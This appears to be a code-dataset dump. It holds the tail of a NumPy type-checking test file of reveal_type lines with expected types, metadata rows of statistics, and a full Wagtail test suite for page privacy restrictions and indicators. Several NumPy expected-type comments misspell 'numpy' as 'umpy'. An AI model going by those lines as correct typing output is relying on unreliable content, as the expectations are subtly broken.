reveal_type(+i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(+i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(+u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(+u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(+td) # E: numpy.timedelta64
reveal_type(+AR) # E: Union[numpy.ndarray*, numpy.generic]
reveal_type(abs(c16)) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(abs(c8)) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(abs(f8)) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(abs(f4)) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(abs(i8)) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(abs(i4)) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(abs(u8)) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(abs(u4)) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(abs(td)) # E: numpy.timedelta64
reveal_type(abs(b_)) # E: numpy.bool_
reveal_type(abs(AR)) # E: Union[numpy.ndarray*, numpy.generic]
# Time structures
reveal_type(dt + td) # E: numpy.datetime64
reveal_type(dt + i) # E: numpy.datetime64
reveal_type(dt + i4) # E: numpy.datetime64
reveal_type(dt + i8) # E: numpy.datetime64
reveal_type(dt - dt) # E: numpy.timedelta64
reveal_type(dt - i) # E: numpy.datetime64
reveal_type(dt - i4) # E: numpy.datetime64
reveal_type(dt - i8) # E: numpy.datetime64
reveal_type(td + td) # E: numpy.timedelta64
reveal_type(td + i) # E: numpy.timedelta64
reveal_type(td + i4) # E: numpy.timedelta64
reveal_type(td + i8) # E: numpy.timedelta64
reveal_type(td - td) # E: numpy.timedelta64
reveal_type(td - i) # E: numpy.timedelta64
reveal_type(td - i4) # E: numpy.timedelta64
reveal_type(td - i8) # E: numpy.timedelta64
reveal_type(td / f) # E: numpy.timedelta64
reveal_type(td / f4) # E: numpy.timedelta64
reveal_type(td / f8) # E: numpy.timedelta64
reveal_type(td / td) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(td // td) # E: numpy.signedinteger[numpy.typing._64Bit]
# boolean
reveal_type(b_ / b) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / u8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / u4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(b_ / c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ / c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ / c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u4 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 / b_) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(c / b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 / b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 / b_) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
# Complex
reveal_type(c16 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + b) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i) # E: numpy.complexfloating[Any, Any]
reveal_type(c16 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c16 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f4 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i4 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i + c16) # E: numpy.complexfloating[Any, Any]
reveal_type(AR + c16) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + f4) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + i4) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + b_) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + b) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + f) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + i) # E: numpy.complexfloating[Any, Any]
reveal_type(c8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c16 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(f4 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(i4 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b_ + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i + c8) # E: numpy.complexfloating[Any, Any]
reveal_type(AR + c8) # E: Union[numpy.ndarray, numpy.generic]
# Float
reveal_type(f8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + b) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i) # E: numpy.floating[Any]
reveal_type(f8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(c + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + f8) # E: numpy.floating[Any]
reveal_type(AR + f8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + i4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + b_) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + b) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f4 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + i) # E: numpy.floating[Any]
reveal_type(f4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f4) # E: umpy.floating[numpy.typing._32Bit]
reveal_type(i4 + f4) # E: umpy.floating[numpy.typing._32Bit]
reveal_type(b_ + f4) # E: umpy.floating[numpy.typing._32Bit]
reveal_type(b + f4) # E: umpy.floating[numpy.typing._32Bit]
reveal_type(c + f4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + f4) # E: numpy.floating[Any]
reveal_type(AR + f4) # E: Union[numpy.ndarray, numpy.generic]
# Int
reveal_type(i8 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i8 + i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i8 + b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + i) # E: numpy.signedinteger[Any]
reveal_type(i8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u8 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + i4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + u4) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(u8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u8 + i) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i4 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u4 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(b_ + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(b + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(c + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + i8) # E: numpy.signedinteger[Any]
reveal_type(AR + i8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u8 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(i4 + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(c + u8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + u8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(AR + u8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i4 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + i) # E: numpy.signedinteger[Any]
reveal_type(i4 + b_) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + b) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u4 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + i4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u4 + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + i) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + b_) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + b) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i + i4) # E: numpy.signedinteger[Any]
reveal_type(b_ + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(b + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(AR + i4) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i4 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + u4) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u4 + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(b_ + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(b + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(i + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(AR + u4) # E: Union[numpy.ndarray, numpy.generic]
| 57.349315 | 95 | 0.741789 | 2,509 | 16,746 | 4.745317 | 0.024312 | 0.218041 | 0.236519 | 0.242063 | 0.969931 | 0.968503 | 0.940618 | 0.9234 | 0.90005 | 0.793214 | 0 | 0.056994 | 0.105219 | 16,746 | 291 | 96 | 57.546392 | 0.737587 | 0.651021 | 0 | 0.152 | 0 | 0 | 0.000357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004 | 0 | 0.004 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8a6f93e9ef7c5b751f5ccfb1caee967e0d9863bd | 15,639 | py | Python | wagtail-repository/wagtail/admin/tests/test_privacy.py | TobiasSkovgaardJepsen/wagtail-on-heroku | 17e4720f86023225e0704890688998a80bb87a17 | [
"BSD-3-Clause"
] | null | null | null | wagtail-repository/wagtail/admin/tests/test_privacy.py | TobiasSkovgaardJepsen/wagtail-on-heroku | 17e4720f86023225e0704890688998a80bb87a17 | [
"BSD-3-Clause"
] | 4 | 2020-06-05T17:00:01.000Z | 2021-06-17T20:15:01.000Z | wagtail-repository/wagtail/admin/tests/test_privacy.py | TobiasSkovgaardJepsen/wagtail-on-heroku | 17e4720f86023225e0704890688998a80bb87a17 | [
"BSD-3-Clause"
] | 1 | 2019-04-16T14:14:55.000Z | 2019-04-16T14:14:55.000Z | from django.contrib.auth.models import Group
from django.test import TestCase
from django.urls import reverse
from wagtail.tests.testapp.models import SimplePage
from wagtail.tests.utils import WagtailTestUtils
from wagtail.core.models import Page, PageViewRestriction
class TestSetPrivacyView(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
# Create some pages
self.homepage = Page.objects.get(id=2)
self.public_page = self.homepage.add_child(instance=SimplePage(
title="Public page",
content="hello",
live=True,
))
self.private_page = self.homepage.add_child(instance=SimplePage(
title="Private page",
content="hello",
live=True,
))
PageViewRestriction.objects.create(
page=self.private_page, restriction_type='password', password='password123'
)
self.private_child_page = self.private_page.add_child(instance=SimplePage(
title="Private child page",
content="hello",
live=True,
))
self.private_groups_page = self.homepage.add_child(instance=SimplePage(
title="Private groups page",
content="hello",
live=True,
))
restriction = PageViewRestriction.objects.create(page=self.private_groups_page, restriction_type='groups')
self.group = Group.objects.create(name='Private page group')
self.group2 = Group.objects.create(name='Private page group2')
restriction.groups.add(self.group)
restriction.groups.add(self.group2)
self.private_groups_child_page = self.private_groups_page.add_child(instance=SimplePage(
title="Private groups child page",
content="hello",
live=True,
))
def test_get_public(self):
"""
This tests that a blank form is returned when a user opens the set_privacy view on a public page
"""
response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
self.assertEqual(response.context['page'].specific, self.public_page)
# Check form attributes
self.assertEqual(response.context['form']['restriction_type'].value(), 'none')
def test_get_private(self):
"""
This tests that the restriction type and password fields as set correctly
when a user opens the set_privacy view on a public page
"""
response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
self.assertEqual(response.context['page'].specific, self.private_page)
# Check form attributes
self.assertEqual(response.context['form']['restriction_type'].value(), 'password')
self.assertEqual(response.context['form']['password'].value(), 'password123')
self.assertEqual(response.context['form']['groups'].value(), [])
def test_get_private_child(self):
"""
This tests that the set_privacy view tells the user
that the password restriction has been applied to an ancestor
"""
response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_child_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/ancestor_privacy.html')
self.assertEqual(response.context['page_with_restriction'].specific, self.private_page)
def test_set_password_restriction(self):
"""
This tests that setting a password restriction using the set_privacy view works
"""
post_data = {
'restriction_type': 'password',
'password': 'helloworld',
'groups': [],
}
response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
self.assertContains(response, "modal.respond('setPermission', false);")
# Check that a page restriction has been created
self.assertTrue(PageViewRestriction.objects.filter(page=self.public_page).exists())
restriction = PageViewRestriction.objects.get(page=self.public_page)
# Check that the password is set correctly
self.assertEqual(restriction.password, 'helloworld')
# Check that the restriction_type is set correctly
self.assertEqual(restriction.restriction_type, 'password')
# Be sure there are no groups set
self.assertEqual(restriction.groups.count(), 0)
def test_set_password_restriction_password_unset(self):
"""
This tests that the password field on the form is validated correctly
"""
post_data = {
'restriction_type': 'password',
'password': '',
'groups': [],
}
response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
# Check that a form error was raised
self.assertFormError(response, 'form', 'password', "This field is required.")
def test_unset_password_restriction(self):
"""
This tests that removing a password restriction using the set_privacy view works
"""
post_data = {
'restriction_type': 'none',
'password': '',
'groups': [],
}
response = self.client.post(
reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
self.assertContains(response, "modal.respond('setPermission', true);")
# Check that the page restriction has been deleted
self.assertFalse(PageViewRestriction.objects.filter(page=self.private_page).exists())
def test_get_private_groups(self):
"""
This tests that the restriction type and group fields as set correctly when a user opens the set_privacy view on a public page
"""
response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_groups_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
self.assertEqual(response.context['page'].specific, self.private_groups_page)
# Check form attributes
self.assertEqual(response.context['form']['restriction_type'].value(), 'groups')
self.assertEqual(response.context['form']['password'].value(), '')
self.assertEqual(response.context['form']['groups'].value(), [self.group.id, self.group2.id])
def test_set_group_restriction(self):
"""
This tests that setting a group restriction using the set_privacy view works
"""
post_data = {
'restriction_type': 'groups',
'password': '',
'groups': [self.group.id, self.group2.id],
}
response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
self.assertContains(response, "modal.respond('setPermission', false);")
# Check that a page restriction has been created
self.assertTrue(PageViewRestriction.objects.filter(page=self.public_page).exists())
restriction = PageViewRestriction.objects.get(page=self.public_page)
# restriction_type should be 'groups'
self.assertEqual(restriction.restriction_type, 'groups')
# Be sure there is no password set
self.assertEqual(restriction.password, '')
# Check that the groups are set correctly
self.assertEqual(
set(PageViewRestriction.objects.get(page=self.public_page).groups.all()),
set([self.group, self.group2])
)
def test_set_group_restriction_password_unset(self):
"""
This tests that the group fields on the form are validated correctly
"""
post_data = {
'restriction_type': 'groups',
'password': '',
'groups': [],
}
response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
# Check that a form error was raised
self.assertFormError(response, 'form', 'groups', "Please select at least one group.")
def test_unset_group_restriction(self):
"""
This tests that removing a groups restriction using the set_privacy view works
"""
post_data = {
'restriction_type': 'none',
'password': '',
'groups': [],
}
response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )), post_data)
# Check response
self.assertEqual(response.status_code, 200)
self.assertContains(response, "modal.respond('setPermission', true);")
# Check that the page restriction has been deleted
self.assertFalse(PageViewRestriction.objects.filter(page=self.private_page).exists())
class TestPrivacyIndicators(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
# Create some pages
self.homepage = Page.objects.get(id=2)
self.public_page = self.homepage.add_child(instance=SimplePage(
title="Public page",
content="hello",
live=True,
))
self.private_page = self.homepage.add_child(instance=SimplePage(
title="Private page",
content="hello",
live=True,
))
PageViewRestriction.objects.create(
page=self.private_page, restriction_type='password', password='password123'
)
self.private_child_page = self.private_page.add_child(instance=SimplePage(
title="Private child page",
content="hello",
live=True,
))
def test_explorer_public(self):
"""
This tests that the privacy indicator on the public pages explore view is set to "PUBLIC"
"""
response = self.client.get(reverse('wagtailadmin_explore', args=(self.public_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator public">')
self.assertNotContains(response, '<div class="privacy-indicator private">')
def test_explorer_private(self):
"""
This tests that the privacy indicator on the private pages explore view is set to "PRIVATE"
"""
response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator private">')
self.assertNotContains(response, '<div class="privacy-indicator public">')
def test_explorer_private_child(self):
"""
This tests that the privacy indicator on the private child pages explore view is set to "PRIVATE"
"""
response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_child_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator private">')
self.assertNotContains(response, '<div class="privacy-indicator public">')
def test_explorer_list_homepage(self):
"""
This tests that there is a padlock displayed next to the private page in the homepages explorer listing
"""
response = self.client.get(reverse('wagtailadmin_explore', args=(self.homepage.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Must have one privacy icon (next to the private page)
self.assertContains(response, "<span class=\"indicator privacy-indicator icon icon-no-view\"", count=1)
def test_explorer_list_private(self):
"""
This tests that there is a padlock displayed
next to the private child page in the private pages explorer listing
"""
response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Must have one privacy icon (next to the private child page)
self.assertContains(response, "<span class=\"indicator privacy-indicator icon icon-no-view\"", count=1)
def test_edit_public(self):
"""
This tests that the privacy indicator on the public pages edit view is set to "PUBLIC"
"""
response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.public_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator public">')
self.assertNotContains(response, '<div class="privacy-indicator private">')
def test_edit_private(self):
"""
This tests that the privacy indicator on the private pages edit view is set to "PRIVATE"
"""
response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.private_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator private">')
self.assertNotContains(response, '<div class="privacy-indicator public">')
def test_edit_private_child(self):
"""
This tests that the privacy indicator on the private child pages edit view is set to "PRIVATE"
"""
response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.private_child_page.id, )))
# Check the response
self.assertEqual(response.status_code, 200)
# Check the privacy indicator is public
self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
self.assertContains(response, '<div class="privacy-indicator private">')
self.assertNotContains(response, '<div class="privacy-indicator public">')
| 40.939791 | 134 | 0.659569 | 1,752 | 15,639 | 5.763128 | 0.0879 | 0.042785 | 0.066059 | 0.030306 | 0.877686 | 0.858077 | 0.820442 | 0.76389 | 0.743389 | 0.737348 | 0 | 0.00618 | 0.23435 | 15,639 | 381 | 135 | 41.047244 | 0.837064 | 0.18748 | 0 | 0.606796 | 0 | 0 | 0.184443 | 0.09856 | 0 | 0 | 0 | 0 | 0.334951 | 1 | 0.097087 | false | 0.101942 | 0.029126 | 0 | 0.135922 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
8a80396fab65436dec17e8fa17395034af49db54 | 5,311 | py | Python | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
